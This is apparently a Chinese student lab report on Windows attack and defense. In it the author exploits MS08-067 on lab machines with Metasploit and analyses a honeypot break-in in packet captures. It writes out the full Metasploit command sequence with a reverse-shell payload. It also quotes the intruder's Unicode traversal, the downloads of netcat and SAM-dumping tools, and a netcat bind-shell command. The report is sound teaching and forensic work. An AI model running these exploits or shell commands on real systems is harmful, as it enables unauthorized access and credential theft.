实践六 Windows操作系统安全攻防
一、实践内容
1、动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
2、取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击?
攻击者如何使用这个破解工具进入并控制了系统?
攻击者获得系统访问权限后做了什么?
我们如何防止这样的攻击?
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
3、团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
二、实践过程
1、动手实践Metasploit windows attacker
输入命令行msfconsole进入启动msfconsole
输入命令行search ms08_067查看漏洞ms08_067详细信息
看路径可以知道这是一个渗透攻击Windows SMB协议的
输入use windows/smb/ms08_067_netapi 进入漏洞所在的文件
输入show options查看此漏洞需要的设置
输入show payloads显示此漏洞的载荷
选择第三个载荷进行攻击,输入以下命令
set payload generic/shell_reverse_tcp //设置载荷
set RHOST 192.168.200.7 //设置要攻击的主机(Win2kServer)
set LHOSt 192.168.200.4 //设置本机(kali)
输入exploit进行攻击,出现会话连接即攻击成功
回车即可进入受害者靶机的shell
输入ipconfig查看靶机的IP地址
2、 取证分析实践:解码一次成功的NT系统破解攻击
打开log文件,筛选有用信息进行分析
ip.addr ==172.16.1.106 and http
跟踪数据包的tcp数据流
存在特殊字符%C0%AF。查询百度可知,发现%C0%AF为Unicode编码,由此判断攻击者进行了Unicode攻击以打开boot.ini文件。因此,存在Unicode漏洞攻击
使用http.request.uri contains “msadc” 进行筛选,可以看到攻击机成功上传了工具
筛选ftp连接,发现直到编号1106连接成功
追踪TCP流,可以看出:攻击者通过创建了ftpcom脚本,使用ftp连接www.nether.net,并以johna2k为用户haxedj00为密码下载 nc.exe、pdump.exe和samdump.dll
在下载完文件之后,查看到 1233 号数据包,攻击者执行了这样一条命令:cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻击者连接了6969端口,并且获得了访问权限
继续查看http数据流,可以看到删除了http的文件,猜测攻击者准备溜走
查看tcp数据流时,发现其是蜜罐攻击。攻击者警觉了他的目标是一台蜜罐主机,攻击者写了这是他见过的最好的蜜罐
3 、团队对抗实践:windows系统远程渗透攻击和分析
1、防御实践
Kali-Linux攻击机(袁思承) 192.168.126.201
Win2kServer_SP0_target靶机 (祝浩宣) 192.168.126.141
首先,查看自己的靶机的IP地址并ping对方的攻击机如下:
被对方攻击后,首先发现自己的主机中多了对方创建的文件夹yuansichengiscoming!
使用wireshark抓包能够发现对方的TCP流以及各类操作:
跟踪TCP流发现,对方入侵我的主机以后使用了以下命令:
2、攻击实践
Kali-Linux攻击机(祝浩宣)192.168.126.125
Win2kServer_SP0_target靶机 (袁思承) 192.168.126.79
对该IP地址的Win2kServer_SP0_target靶机进行攻击,首先使用以下命令打开Metasploit
输入以下命令调用MS08-067漏洞以实现相关的攻击,从而利用MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
use exploit/windows/smb/ms08_067_netapi
输入以下命令显示可用的攻击负载
show payloads
选择以下攻击负载以实现反向连接
set payload generic/shell_reverse_tcp
设置远程渗透攻击的相关信息,即设置攻击目标IP,设置本机IP,再使用show options查看设置的信息:
set RHOST 192.168.126.79
set LHOST 192.168.126.125
show options
输入以下命令进行攻击
exploit
使用以下命令在对方主机中创建文件夹并进入文件夹
mkdir zhuhaoxuan
cd zhuhaoxuan
查看对方的主机,能够看见已经成功创建该文件夹:
3.学习中遇到的问题及解决
问题:在Win2k直连后,出现无法上网或IP地址为0.0.0.0的情况。
解决方案:修改Win2k的网络设置,将IP地址设置改为自动获取而非手动指定。
4.学习感悟、思考等
通过这次实验,我学到了如何运用msfconsole工具对靶机进行漏洞攻击,并且分析了一次成功的NT系统破解攻击。最后,我还参与了与同学的攻防实战演练,这大大加深了我对Windows系统远程渗透攻击的理解,并且学习了如何预防和应对漏洞攻击的方法。